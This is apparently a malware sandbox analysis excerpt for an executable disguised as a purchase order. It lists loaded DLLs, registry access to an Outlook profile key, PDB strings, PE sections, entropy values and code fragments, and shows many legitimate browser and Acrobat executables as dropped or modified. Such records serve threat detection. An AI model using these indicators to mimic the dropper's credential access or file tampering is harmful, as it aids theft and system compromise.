                        Source: C:\Users\user\AppData\Local\Dunlop\Grinnellia.exeSection loaded: dhcpcsvc.dll
                        Source: C:\Users\user\AppData\Local\Dunlop\Grinnellia.exeSection loaded: webio.dll
                        Source: C:\Users\user\AppData\Local\Dunlop\Grinnellia.exeSection loaded: windows.storage.dll
                        Source: C:\Users\user\AppData\Local\Dunlop\Grinnellia.exeSection loaded: wldp.dll
                        Source: C:\Users\user\AppData\Local\Dunlop\Grinnellia.exeSection loaded: ondemandconnroutehelper.dll
                        Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exeSection loaded: mscoree.dll
                        Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exeSection loaded: apphelp.dll
                        Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exeSection loaded: kernel.appcore.dll
                        Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exeSection loaded: version.dll
                        Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exeSection loaded: vcruntime140_clr0400.dll
                        Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exeSection loaded: ucrtbase_clr0400.dll
                        Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exeSection loaded: ucrtbase_clr0400.dll
                        Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exeSection loaded: uxtheme.dll
                        Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exeSection loaded: windows.storage.dll
                        Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exeSection loaded: wldp.dll
                        Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exeSection loaded: profapi.dll
                        Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exeSection loaded: cryptsp.dll
                        Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exeSection loaded: rsaenh.dll
                        Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exeSection loaded: cryptbase.dll
                        Source: C:\Windows\System32\AppVClient.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{52BC3999-6E52-4E8A-87C4-0A2A0CC359B1}\InProcServer32Jump to behavior
                        Source: Window RecorderWindow detected: More than 3 window changes detected
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\server01.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                        Source: PO #09465610_GQ 003745_SO-242000846.exeStatic file information: File size 1851904 > 1048576
                        Source: PO #09465610_GQ 003745_SO-242000846.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                        Source: Binary string: C:\work\p4\splinters\Splinters\S\BuildResults\bin\Win32\ReaderRelease\FullTrustNotifier\FullTrustNotifier.pdb77.GCTL source: alg.exe, 00000003.00000003.2571726187.00000000014E0000.00000004.00001000.00020000.00000000.sdmp
                        Source: Binary string: D:\DCB\CBT_Main\BuildResults\bin\Win32\Release\armsvc.pdb source: PO #09465610_GQ 003745_SO-242000846.exe, 00000000.00000003.2053758653.0000000003EC0000.00000004.00001000.00020000.00000000.sdmp
                        Source: Binary string: E:\PkgInstaller\base\ntsetup\SrvPack.Main\tools\sfxcab\sfxcab\objfre\i386\sfxcab.pdb source: alg.exe, 00000003.00000003.2635972950.0000000001430000.00000004.00001000.00020000.00000000.sdmp, alg.exe, 00000003.00000003.2627279177.00000000014E0000.00000004.00001000.00020000.00000000.sdmp, alg.exe, 00000003.00000003.2625776656.00000000014C0000.00000004.00001000.00020000.00000000.sdmp
                        Source: Binary string: D:\T\BuildResults\bin\Release_x64\AcrobatInfo.pdb source: alg.exe, 00000003.00000003.2225655829.00000000014D0000.00000004.00001000.00020000.00000000.sdmp
                        Source: Binary string: D:\T\BuildResults\bin\Release_x64\TextExtractor.pdb444 source: alg.exe, 00000003.00000003.2390711215.0000000001570000.00000004.00001000.00020000.00000000.sdmp
                        Source: Binary string: D:\T\BuildResults\bin\Release_x64\TextExtractor.pdb source: alg.exe, 00000003.00000003.2390711215.0000000001570000.00000004.00001000.00020000.00000000.sdmp
                        Source: Binary string: ADelRCP_Exec.pdb source: alg.exe, 00000003.00000003.2405957851.0000000001570000.00000004.00001000.00020000.00000000.sdmp
                        Source: Binary string: mavinject32.pdbGCTL source: alg.exe, 00000003.00000003.2700657166.00000000004A0000.00000004.00001000.00020000.00000000.sdmp, alg.exe, 00000003.00000003.2696751735.0000000000490000.00000004.00001000.00020000.00000000.sdmp, MavInject32.exe.3.dr
                        Source: Binary string: d:\dbs\el\omr\target\x86\ship\licensing\x-none\ospprearm.pdb source: OSPPREARM.EXE.3.dr
                        Source: Binary string: MicrosoftEdgeUpdateBroker_unsigned.pdb source: MicrosoftEdgeUpdateBroker.exe.3.dr
                        Source: Binary string: _.pdb source: RegSvcs.exe, 0000000D.00000002.2136041654.0000000002711000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.2137004258.0000000002A50000.00000004.08000000.00040000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.2139311354.0000000003C95000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000018.00000002.2290135083.000000000398F000.00000004.00000800.00020000.00000000.sdmp
                        Source: Binary string: crashreporter.pdb source: alg.exe, 00000003.00000003.2847166658.0000000001450000.00000004.00001000.00020000.00000000.sdmp
                        Source: Binary string: plugin-container.pdb source: alg.exe, 00000003.00000003.2933295512.0000000001450000.00000004.00001000.00020000.00000000.sdmp
                        Source: Binary string: wntdll.pdb source: Grinnellia.exe, 00000008.00000003.2095158890.0000000004AB0000.00000004.00001000.00020000.00000000.sdmp, Grinnellia.exe, 00000008.00000003.2093103078.0000000004910000.00000004.00001000.00020000.00000000.sdmp, Grinnellia.exe, 0000000B.00000003.2113799471.0000000004910000.00000004.00001000.00020000.00000000.sdmp, Grinnellia.exe, 0000000B.00000003.2123309552.0000000004B10000.00000004.00001000.00020000.00000000.sdmp, Grinnellia.exe, 00000016.00000003.2239183248.00000000050E0000.00000004.00001000.00020000.00000000.sdmp, Grinnellia.exe, 00000016.00000003.2231355284.0000000004990000.00000004.00001000.00020000.00000000.sdmp
                        Source: Binary string: D:\T\BuildResults\bin\Release_x64\WebInstaller\AcroMiniServicesUpdater.pdb source: alg.exe, 00000003.00000003.2361122927.0000000001570000.00000004.00001000.00020000.00000000.sdmp
                        Source: Binary string: D:\T\BuildResults\bin\Release_x64\plug_ins\pi_brokers\MSRMSPIBroker.pdbAAAGCTL source: alg.exe, 00000003.00000003.2566964234.00000000014E0000.00000004.00001000.00020000.00000000.sdmp
                        Source: Binary string: D:\dbs\el\omr\Target\x64\ship\click2run\x-none\InspectorOfficeGadget.pdb source: alg.exe, 00000003.00000003.2670954388.0000000000490000.00000004.00001000.00020000.00000000.sdmp
                        Source: Binary string: D:\T\Acrobat\Installers\ShowAppPickerForPDF\Release_x64\ShowAppPickerForPDF.pdb source: alg.exe, 00000003.00000003.2583011875.00000000014E0000.00000004.00001000.00020000.00000000.sdmp, alg.exe, 00000003.00000003.2590018724.0000000001430000.00000004.00001000.00020000.00000000.sdmp
                        Source: Binary string: D:\T\BuildResults\bin\Release_x64\WCChromeNativeMessagingHost.pdb888 source: alg.exe, 00000003.00000003.2443691533.0000000001570000.00000004.00001000.00020000.00000000.sdmp
                        Source: Binary string: Acrobat_SL.pdb((( source: alg.exe, 00000003.00000003.2248053012.00000000014C0000.00000004.00001000.00020000.00000000.sdmp
                        Source: Binary string: pingsender.pdb source: alg.exe, 00000003.00000003.2911797634.0000000001450000.00000004.00001000.00020000.00000000.sdmp, pingsender.exe.3.dr
                        Source: Binary string: ADelRCP_Exec.pdbCC9 source: alg.exe, 00000003.00000003.2405957851.0000000001570000.00000004.00001000.00020000.00000000.sdmp
                        Source: Binary string: D:\T\BuildResults\bin\Release_x64\AcroBroker.pdb source: alg.exe, 00000003.00000003.2269957277.0000000001570000.00000004.00001000.00020000.00000000.sdmp
                        Source: Binary string: private_browsing.pdb source: alg.exe, 00000003.00000003.2954259181.0000000001440000.00000004.00001000.00020000.00000000.sdmp
                        Source: Binary string: Acrobat_SL.pdb source: alg.exe, 00000003.00000003.2248053012.00000000014C0000.00000004.00001000.00020000.00000000.sdmp
                        Source: Binary string: E:\PkgInstaller\base\ntsetup\SrvPack.Main\tools\sfxcab\sfxcab\objfre\i386\sfxcab.pdbU source: alg.exe, 00000003.00000003.2635972950.0000000001430000.00000004.00001000.00020000.00000000.sdmp, alg.exe, 00000003.00000003.2627279177.00000000014E0000.00000004.00001000.00020000.00000000.sdmp, alg.exe, 00000003.00000003.2625776656.00000000014C0000.00000004.00001000.00020000.00000000.sdmp
                        Source: Binary string: D:\T\BuildResults\bin\Release_x64\WebInstaller\AcroMiniServicesUpdater.pdbT source: alg.exe, 00000003.00000003.2361122927.0000000001570000.00000004.00001000.00020000.00000000.sdmp
                        Source: Binary string: C:\workspace\CR-Windows-x64-Client-Builder\x64\Release\CRWindowsClientService.pdbGG source: alg.exe, 00000003.00000003.2471181991.0000000001570000.00000004.00001000.00020000.00000000.sdmp
                        Source: Binary string: D:\T\BuildResults\bin\Release_x64\AcrobatInfo.pdb))) source: alg.exe, 00000003.00000003.2225655829.00000000014D0000.00000004.00001000.00020000.00000000.sdmp
                        Source: Binary string: mavinject32.pdb source: alg.exe, 00000003.00000003.2700657166.00000000004A0000.00000004.00001000.00020000.00000000.sdmp, alg.exe, 00000003.00000003.2696751735.0000000000490000.00000004.00001000.00020000.00000000.sdmp, MavInject32.exe.3.dr
                        Source: Binary string: maintenanceservice.pdb source: alg.exe, 00000003.00000003.2881829514.0000000001450000.00000004.00001000.00020000.00000000.sdmp
                        Source: Binary string: 64BitMAPIBroker.pdb source: alg.exe, 00000003.00000003.2546360470.00000000014E0000.00000004.00001000.00020000.00000000.sdmp
                        Source: Binary string: D:\dbs\el\omr\Target\x64\ship\click2run\x-none\InspectorOfficeGadget.pdbY source: alg.exe, 00000003.00000003.2670954388.0000000000490000.00000004.00001000.00020000.00000000.sdmp
                        Source: Binary string: firefox.pdb source: alg.exe, 00000003.00000003.2874633296.0000000001450000.00000004.00001000.00020000.00000000.sdmp
                        Source: Binary string: E:\jenkins\workspace\NGL_WORKFLOW\build\master\win64\Release\Acrobat\project\win\ngl-workflow\x64\Release (Acrobat)\adobe_licensing_wf_helper_acro.pdb source: alg.exe, 00000003.00000003.2530364880.00000000014E0000.00000004.00001000.00020000.00000000.sdmp
                        Source: Binary string: firefox.pdbP source: alg.exe, 00000003.00000003.2874633296.0000000001450000.00000004.00001000.00020000.00000000.sdmp
                        Source: Binary string: D:\T\BuildResults\bin\Release_x64\WCChromeNativeMessagingHost.pdb source: alg.exe, 00000003.00000003.2443691533.0000000001570000.00000004.00001000.00020000.00000000.sdmp
                        Source: Binary string: C:\b\s\w\ir\cache\builder\src\out\Release_x64\setup.exe.pdb source: setup.exe1.3.dr
                        Source: Binary string: private_browsing.pdbp source: alg.exe, 00000003.00000003.2954259181.0000000001440000.00000004.00001000.00020000.00000000.sdmp
                        Source: Binary string: C:\work\p4\splinters\Splinters\S\BuildResults\bin\Win32\ReaderRelease\FullTrustNotifier\FullTrustNotifier.pdb source: alg.exe, 00000003.00000003.2571726187.00000000014E0000.00000004.00001000.00020000.00000000.sdmp
                        Source: Binary string: C:\workspace\CR-Windows-x64-Client-Builder\x64\Release\CRWindowsClientService.pdb source: alg.exe, 00000003.00000003.2471181991.0000000001570000.00000004.00001000.00020000.00000000.sdmp
                        Source: Binary string: D:\T\BuildResults\bin\Release\Plug_ins\pi_brokers\32BitMAPIBroker.pdb@@ source: alg.exe, 00000003.00000003.2535143578.00000000014E0000.00000004.00001000.00020000.00000000.sdmp
                        Source: Binary string: D:\T\BuildResults\bin\Release_x64\plug_ins\pi_brokers\MSRMSPIBroker.pdb source: alg.exe, 00000003.00000003.2566964234.00000000014E0000.00000004.00001000.00020000.00000000.sdmp
                        Source: Binary string: maintenanceservice.pdb` source: alg.exe, 00000003.00000003.2881829514.0000000001450000.00000004.00001000.00020000.00000000.sdmp
                        Source: Binary string: D:\T\Acrobat\Installers\ShowAppPickerForPDF\Release_x64\ShowAppPickerForPDF.pdb$$ source: alg.exe, 00000003.00000003.2583011875.00000000014E0000.00000004.00001000.00020000.00000000.sdmp, alg.exe, 00000003.00000003.2590018724.0000000001430000.00000004.00001000.00020000.00000000.sdmp
                        Source: Binary string: wntdll.pdbUGP source: Grinnellia.exe, 00000008.00000003.2095158890.0000000004AB0000.00000004.00001000.00020000.00000000.sdmp, Grinnellia.exe, 00000008.00000003.2093103078.0000000004910000.00000004.00001000.00020000.00000000.sdmp, Grinnellia.exe, 0000000B.00000003.2113799471.0000000004910000.00000004.00001000.00020000.00000000.sdmp, Grinnellia.exe, 0000000B.00000003.2123309552.0000000004B10000.00000004.00001000.00020000.00000000.sdmp, Grinnellia.exe, 00000016.00000003.2239183248.00000000050E0000.00000004.00001000.00020000.00000000.sdmp, Grinnellia.exe, 00000016.00000003.2231355284.0000000004990000.00000004.00001000.00020000.00000000.sdmp
                        Source: Binary string: D:\T\BuildResults\bin\Release_x64\Eula.pdb source: alg.exe, 00000003.00000003.2488059253.00000000014E0000.00000004.00001000.00020000.00000000.sdmp
                        Source: Binary string: ALG.pdb source: PO #09465610_GQ 003745_SO-242000846.exe, 00000000.00000003.2060386769.0000000003F20000.00000004.00001000.00020000.00000000.sdmp
                        Source: Binary string: d:\dbs\el\omr\target\x86\ship\licensing\x-none\ospprearm.pdb00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000S source: OSPPREARM.EXE.3.dr
                        Source: Binary string: ALG.pdbGCTL source: PO #09465610_GQ 003745_SO-242000846.exe, 00000000.00000003.2060386769.0000000003F20000.00000004.00001000.00020000.00000000.sdmp
                        Source: Binary string: D:\T\BuildResults\bin\Release_x64\AcroBroker.pdbTTT source: alg.exe, 00000003.00000003.2269957277.0000000001570000.00000004.00001000.00020000.00000000.sdmp
                        Source: Binary string: updater.pdb source: alg.exe, 00000003.00000003.2980929452.0000000001440000.00000004.00001000.00020000.00000000.sdmp
                        Source: Binary string: AppVShNotify.pdb source: alg.exe, 00000003.00000003.2665025413.0000000000400000.00000004.00001000.00020000.00000000.sdmp
                        Source: Binary string: D:\T\BuildResults\bin\Release\Plug_ins\pi_brokers\32BitMAPIBroker.pdb source: alg.exe, 00000003.00000003.2535143578.00000000014E0000.00000004.00001000.00020000.00000000.sdmp
                        Source: Binary string: D:\T\BuildResults\bin\Release_x64\Eula.pdb888 source: alg.exe, 00000003.00000003.2488059253.00000000014E0000.00000004.00001000.00020000.00000000.sdmp
                        Source: Binary string: AppVShNotify.pdbGCTL source: alg.exe, 00000003.00000003.2665025413.0000000000400000.00000004.00001000.00020000.00000000.sdmp
                        Source: alg.exe.0.drStatic PE information: 0xF67E8745 [Tue Jan 18 10:28:21 2101 UTC]
                        Source: C:\Users\user\Desktop\PO #09465610_GQ 003745_SO-242000846.exeCode function: 0_2_0041E01E LoadLibraryA,GetProcAddress,0_2_0041E01E
                        Source: DiagnosticsHub.StandardCollector.Service.exe.0.drStatic PE information: real checksum: 0x1fb4b should be: 0x137475
                        Source: armsvc.exe.0.drStatic PE information: section name: .didat
                        Source: alg.exe.0.drStatic PE information: section name: .didat
                        Source: minidump-analyzer.exe.3.drStatic PE information: section name: .00cfg
                        Source: minidump-analyzer.exe.3.drStatic PE information: section name: .voltbl
                        Source: pingsender.exe.3.drStatic PE information: section name: .00cfg
                        Source: pingsender.exe.3.drStatic PE information: section name: .voltbl
                        Source: GoogleCrashHandler64.exe.3.drStatic PE information: section name: _RDATA
                        Source: GoogleCrashHandler64.exe.3.drStatic PE information: section name: .gxfg
                        Source: GoogleCrashHandler64.exe.3.drStatic PE information: section name: .gehcont
                        Source: GoogleUpdateComRegisterShell64.exe.3.drStatic PE information: section name: _RDATA
                        Source: GoogleUpdateComRegisterShell64.exe.3.drStatic PE information: section name: .gxfg
                        Source: GoogleUpdateComRegisterShell64.exe.3.drStatic PE information: section name: .gehcont
                        Source: 117.0.5938.132_chrome_installer.exe.3.drStatic PE information: section name: .00cfg
                        Source: 117.0.5938.132_chrome_installer.exe.3.drStatic PE information: section name: .retplne
                        Source: plugin-container.exe.3.drStatic PE information: section name: .00cfg
                        Source: plugin-container.exe.3.drStatic PE information: section name: .voltbl
                        Source: private_browsing.exe.3.drStatic PE information: section name: .00cfg
                        Source: private_browsing.exe.3.drStatic PE information: section name: .voltbl
                        Source: updater.exe.3.drStatic PE information: section name: .00cfg
                        Source: updater.exe.3.drStatic PE information: section name: .voltbl
                        Source: updater.exe.3.drStatic PE information: section name: _RDATA
                        Source: elevation_service.exe.3.drStatic PE information: section name: .00cfg
                        Source: elevation_service.exe.3.drStatic PE information: section name: .gxfg
                        Source: elevation_service.exe.3.drStatic PE information: section name: .retplne
                        Source: elevation_service.exe.3.drStatic PE information: section name: _RDATA
                        Source: elevation_service.exe.3.drStatic PE information: section name: malloc_h
                        Source: maintenanceservice.exe.3.drStatic PE information: section name: .00cfg
                        Source: maintenanceservice.exe.3.drStatic PE information: section name: .voltbl
                        Source: maintenanceservice.exe.3.drStatic PE information: section name: _RDATA
                        Source: elevation_service.exe0.3.drStatic PE information: section name: .00cfg
                        Source: elevation_service.exe0.3.drStatic PE information: section name: .gxfg
                        Source: elevation_service.exe0.3.drStatic PE information: section name: .retplne
                        Source: elevation_service.exe0.3.drStatic PE information: section name: _RDATA
                        Source: elevation_service.exe0.3.drStatic PE information: section name: malloc_h
                        Source: unpack200.exe.3.drStatic PE information: section name: .00cfg
                        Source: ie_to_edge_stub.exe.3.drStatic PE information: section name: .00cfg
                        Source: ie_to_edge_stub.exe.3.drStatic PE information: section name: .gxfg
                        Source: ie_to_edge_stub.exe.3.drStatic PE information: section name: .retplne
                        Source: ie_to_edge_stub.exe.3.drStatic PE information: section name: _RDATA
                        Source: cookie_exporter.exe.3.drStatic PE information: section name: .00cfg
                        Source: cookie_exporter.exe.3.drStatic PE information: section name: .gxfg
                        Source: cookie_exporter.exe.3.drStatic PE information: section name: .retplne
                        Source: cookie_exporter.exe.3.drStatic PE information: section name: _RDATA
                        Source: Acrobat.exe.3.drStatic PE information: section name: .didat
                        Source: Acrobat.exe.3.drStatic PE information: section name: _RDATA
                        Source: identity_helper.exe.3.drStatic PE information: section name: .00cfg
                        Source: identity_helper.exe.3.drStatic PE information: section name: .gxfg
                        Source: identity_helper.exe.3.drStatic PE information: section name: .retplne
                        Source: identity_helper.exe.3.drStatic PE information: section name: _RDATA
                        Source: identity_helper.exe.3.drStatic PE information: section name: malloc_h
                        Source: setup.exe.3.drStatic PE information: section name: .00cfg
                        Source: setup.exe.3.drStatic PE information: section name: .gxfg
                        Source: setup.exe.3.drStatic PE information: section name: .retplne
                        Source: setup.exe.3.drStatic PE information: section name: LZMADEC
                        Source: setup.exe.3.drStatic PE information: section name: _RDATA
                        Source: setup.exe.3.drStatic PE information: section name: malloc_h
                        Source: msedgewebview2.exe.3.drStatic PE information: section name: .00cfg
                        Source: msedgewebview2.exe.3.drStatic PE information: section name: .gxfg
                        Source: msedgewebview2.exe.3.drStatic PE information: section name: .retplne
                        Source: msedgewebview2.exe.3.drStatic PE information: section name: CPADinfo
                        Source: msedgewebview2.exe.3.drStatic PE information: section name: LZMADEC
                        Source: msedgewebview2.exe.3.drStatic PE information: section name: _RDATA
                        Source: msedgewebview2.exe.3.drStatic PE information: section name: malloc_h
                        Source: msedge_proxy.exe.3.drStatic PE information: section name: .00cfg
                        Source: msedge_proxy.exe.3.drStatic PE information: section name: .gxfg
                        Source: msedge_proxy.exe.3.drStatic PE information: section name: .retplne
                        Source: msedge_proxy.exe.3.drStatic PE information: section name: _RDATA
                        Source: msedge_proxy.exe.3.drStatic PE information: section name: malloc_h
                        Source: msedge_pwa_launcher.exe.3.drStatic PE information: section name: .00cfg
                        Source: msedge_pwa_launcher.exe.3.drStatic PE information: section name: .gxfg
                        Source: msedge_pwa_launcher.exe.3.drStatic PE information: section name: .retplne
                        Source: msedge_pwa_launcher.exe.3.drStatic PE information: section name: LZMADEC
                        Source: msedge_pwa_launcher.exe.3.drStatic PE information: section name: _RDATA
                        Source: msedge_pwa_launcher.exe.3.drStatic PE information: section name: malloc_h
                        Source: notification_click_helper.exe.3.drStatic PE information: section name: .00cfg
                        Source: notification_click_helper.exe.3.drStatic PE information: section name: .gxfg
                        Source: notification_click_helper.exe.3.drStatic PE information: section name: .retplne
                        Source: notification_click_helper.exe.3.drStatic PE information: section name: CPADinfo
                        Source: notification_click_helper.exe.3.drStatic PE information: section name: _RDATA
                        Source: notification_click_helper.exe.3.drStatic PE information: section name: malloc_h
                        Source: pwahelper.exe.3.drStatic PE information: section name: .00cfg
                        Source: pwahelper.exe.3.drStatic PE information: section name: .gxfg
                        Source: pwahelper.exe.3.drStatic PE information: section name: .retplne
                        Source: pwahelper.exe.3.drStatic PE information: section name: _RDATA
                        Source: pwahelper.exe.3.drStatic PE information: section name: malloc_h
                        Source: msedge_proxy.exe0.3.drStatic PE information: section name: .00cfg
                        Source: msedge_proxy.exe0.3.drStatic PE information: section name: .gxfg
                        Source: msedge_proxy.exe0.3.drStatic PE information: section name: .retplne
                        Source: msedge_proxy.exe0.3.drStatic PE information: section name: _RDATA
                        Source: msedge_proxy.exe0.3.drStatic PE information: section name: malloc_h
                        Source: pwahelper.exe0.3.drStatic PE information: section name: .00cfg
                        Source: pwahelper.exe0.3.drStatic PE information: section name: .gxfg
                        Source: pwahelper.exe0.3.drStatic PE information: section name: .retplne
                        Source: pwahelper.exe0.3.drStatic PE information: section name: _RDATA
                        Source: pwahelper.exe0.3.drStatic PE information: section name: malloc_h
                        Source: MicrosoftEdgeUpdate.exe.3.drStatic PE information: section name: .didat
                        Source: AcroCEF.exe.3.drStatic PE information: section name: .didat
                        Source: AcroCEF.exe.3.drStatic PE information: section name: _RDATA
                        Source: SingleClientServicesUpdater.exe.3.drStatic PE information: section name: .didat
                        Source: SingleClientServicesUpdater.exe.3.drStatic PE information: section name: _RDATA
                        Source: AcroCEF.exe0.3.drStatic PE information: section name: .didat
                        Source: AcroCEF.exe0.3.drStatic PE information: section name: _RDATA
                        Source: MicrosoftEdgeUpdateBroker.exe.3.drStatic PE information: section name: .didat
                        Source: MicrosoftEdgeUpdateComRegisterShell64.exe.3.drStatic PE information: section name: .didat
                        Source: MicrosoftEdgeUpdateComRegisterShell64.exe.3.drStatic PE information: section name: _RDATA
                        Source: MicrosoftEdgeUpdateCore.exe.3.drStatic PE information: section name: .didat
                        Source: MicrosoftEdgeUpdateOnDemand.exe.3.drStatic PE information: section name: .didat
                        Source: MicrosoftEdgeUpdateSetup.exe.3.drStatic PE information: section name: .didat
                        Source: C:\Users\user\Desktop\PO #09465610_GQ 003745_SO-242000846.exeCode function: 0_2_00426B05 push ecx; ret 0_2_00426B18
                        Source: C:\Users\user\Desktop\PO #09465610_GQ 003745_SO-242000846.exeCode function: 0_2_00ABB180 push 00ABB0CAh; ret 0_2_00ABB061
                        Source: C:\Users\user\Desktop\PO #09465610_GQ 003745_SO-242000846.exeCode function: 0_2_00ABB180 push 00ABB30Dh; ret 0_2_00ABB1E6
                        Source: C:\Users\user\Desktop\PO #09465610_GQ 003745_SO-242000846.exeCode function: 0_2_00ABB180 push 00ABB2F2h; ret 0_2_00ABB262
                        Source: C:\Users\user\Desktop\PO #09465610_GQ 003745_SO-242000846.exeCode function: 0_2_00ABB180 push 00ABB255h; ret 0_2_00ABB2ED
                        Source: C:\Users\user\Desktop\PO #09465610_GQ 003745_SO-242000846.exeCode function: 0_2_00ABB180 push 00ABB2D0h; ret 0_2_00ABB346
                        Source: C:\Users\user\Desktop\PO #09465610_GQ 003745_SO-242000846.exeCode function: 0_2_00ABB180 push 00ABB37Fh; ret 0_2_00ABB3B7
                        Source: C:\Users\user\Desktop\PO #09465610_GQ 003745_SO-242000846.exeCode function: 0_2_00AB520C push 00AB528Fh; ret 0_2_00AB522D
                        Source: C:\Users\user\Desktop\PO #09465610_GQ 003745_SO-242000846.exeCode function: 0_2_00AD8550 push 00AD852Eh; ret 0_2_00AD7F3A
                        Source: C:\Users\user\Desktop\PO #09465610_GQ 003745_SO-242000846.exeCode function: 0_2_00AD8550 push 00AD8514h; ret 0_2_00AD7F66
                        Source: C:\Users\user\Desktop\PO #09465610_GQ 003745_SO-242000846.exeCode function: 0_2_00AD8550 push 00AD7E66h; ret 0_2_00AD8057
                        Source: C:\Users\user\Desktop\PO #09465610_GQ 003745_SO-242000846.exeCode function: 0_2_00AD8550 push 00AD817Ah; ret 0_2_00AD808B
                        Source: C:\Users\user\Desktop\PO #09465610_GQ 003745_SO-242000846.exeCode function: 0_2_00AD8550 push 00AD82E5h; ret 0_2_00AD80D9
                        Source: C:\Users\user\Desktop\PO #09465610_GQ 003745_SO-242000846.exeCode function: 0_2_00AD8550 push 00AD826Ah; ret 0_2_00AD819E
                        Source: C:\Users\user\Desktop\PO #09465610_GQ 003745_SO-242000846.exeCode function: 0_2_00AD8550 push 00AD849Ch; ret 0_2_00AD81E4
                        Source: C:\Users\user\Desktop\PO #09465610_GQ 003745_SO-242000846.exeCode function: 0_2_00AD8550 push 00AD8321h; ret 0_2_00AD82E0
                        Source: C:\Users\user\Desktop\PO #09465610_GQ 003745_SO-242000846.exeCode function: 0_2_00AD8550 push 00AD7FBFh; ret 0_2_00AD831F
                        Source: C:\Users\user\Desktop\PO #09465610_GQ 003745_SO-242000846.exeCode function: 0_2_00AD8550 push 00AD7FA8h; ret 0_2_00AD834C
                        Source: C:\Users\user\Desktop\PO #09465610_GQ 003745_SO-242000846.exeCode function: 0_2_00AD8550 push 00AD84BAh; ret 0_2_00AD83E2
                        Source: C:\Users\user\Desktop\PO #09465610_GQ 003745_SO-242000846.exeCode function: 0_2_00AD8550 push 00AD8426h; ret 0_2_00AD84D8
                        Source: C:\Users\user\Desktop\PO #09465610_GQ 003745_SO-242000846.exeCode function: 0_2_00AD8550 push 00AD8075h; ret 0_2_00AD84FD
                        Source: C:\Users\user\Desktop\PO #09465610_GQ 003745_SO-242000846.exeCode function: 0_2_00AD8550 push 00AD808Ch; ret 0_2_00AD8512
                        Source: C:\Users\user\Desktop\PO #09465610_GQ 003745_SO-242000846.exeCode function: 0_2_00AD8550 push 00AD8B6Fh; ret 0_2_00AD8596
                        Source: C:\Users\user\Desktop\PO #09465610_GQ 003745_SO-242000846.exeCode function: 0_2_00AD8550 push 00AD8E94h; ret 0_2_00AD85C9
                        Source: C:\Users\user\Desktop\PO #09465610_GQ 003745_SO-242000846.exeCode function: 0_2_00AD8550 push 00AD878Bh; ret 0_2_00AD8734
                        Source: C:\Users\user\Desktop\PO #09465610_GQ 003745_SO-242000846.exeCode function: 0_2_00AD8550 push 00AD8D45h; ret 0_2_00AD87D3
                        Source: C:\Users\user\Desktop\PO #09465610_GQ 003745_SO-242000846.exeCode function: 0_2_00AD8550 push 00AD8E5Fh; ret 0_2_00AD885F
                        Source: C:\Users\user\Desktop\PO #09465610_GQ 003745_SO-242000846.exeCode function: 0_2_00AD8550 push 00AD8AB5h; ret 0_2_00AD8B13
                        Source: C:\Users\user\Desktop\PO #09465610_GQ 003745_SO-242000846.exeCode function: 0_2_00AD8550 push 00AD8784h; ret 0_2_00AD8CA1
                        Source: C:\Users\user\Desktop\PO #09465610_GQ 003745_SO-242000846.exeCode function: 0_2_00AD8550 push 00AD8DC9h; ret 0_2_00AD8E1C
                        Source: C:\Users\user\Desktop\PO #09465610_GQ 003745_SO-242000846.exeCode function: 0_2_00AD8550 push 00AD8D14h; ret 0_2_00AD8E2E
                        Source: PO #09465610_GQ 003745_SO-242000846.exeStatic PE information: section name: .reloc entropy: 7.8713996381848785
                        Source: AppVClient.exe.0.drStatic PE information: section name: .reloc entropy: 7.936521847575095
                        Source: Grinnellia.exe.0.drStatic PE information: section name: .reloc entropy: 7.8713996381848785
                        Source: minidump-analyzer.exe.3.drStatic PE information: section name: .reloc entropy: 7.935473186122002
                        Source: 117.0.5938.132_chrome_installer.exe.3.drStatic PE information: section name: .reloc entropy: 7.934764077756241
                        Source: Aut2exe.exe.3.drStatic PE information: section name: .rsrc entropy: 7.800630228514814
                        Source: Aut2exe_x64.exe.3.drStatic PE information: section name: .rsrc entropy: 7.800485415839352
                        Source: elevation_service.exe.3.drStatic PE information: section name: .reloc entropy: 7.945957132980833
                        Source: 7zFM.exe.3.drStatic PE information: section name: .reloc entropy: 7.932144539514835
                        Source: elevation_service.exe0.3.drStatic PE information: section name: .reloc entropy: 7.94394079844746
                        Source: 7zG.exe.3.drStatic PE information: section name: .reloc entropy: 7.92768722569969
                        Source: Acrobat.exe.3.drStatic PE information: section name: .reloc entropy: 7.9405416003013976
                        Source: identity_helper.exe.3.drStatic PE information: section name: .reloc entropy: 7.940753133148947
                        Source: setup.exe.3.drStatic PE information: section name: .reloc entropy: 7.944746266729019
                        Source: msedgewebview2.exe.3.drStatic PE information: section name: .reloc entropy: 7.936577170542054
                        Source: msedge_proxy.exe.3.drStatic PE information: section name: .reloc entropy: 7.942270218006708
                        Source: msedge_pwa_launcher.exe.3.drStatic PE information: section name: .reloc entropy: 7.946272485769608
                        Source: notification_click_helper.exe.3.drStatic PE information: section name: .reloc entropy: 7.944015784480738
                        Source: pwahelper.exe.3.drStatic PE information: section name: .reloc entropy: 7.940894860459117
                        Source: msedge_proxy.exe0.3.drStatic PE information: section name: .reloc entropy: 7.942273376247071
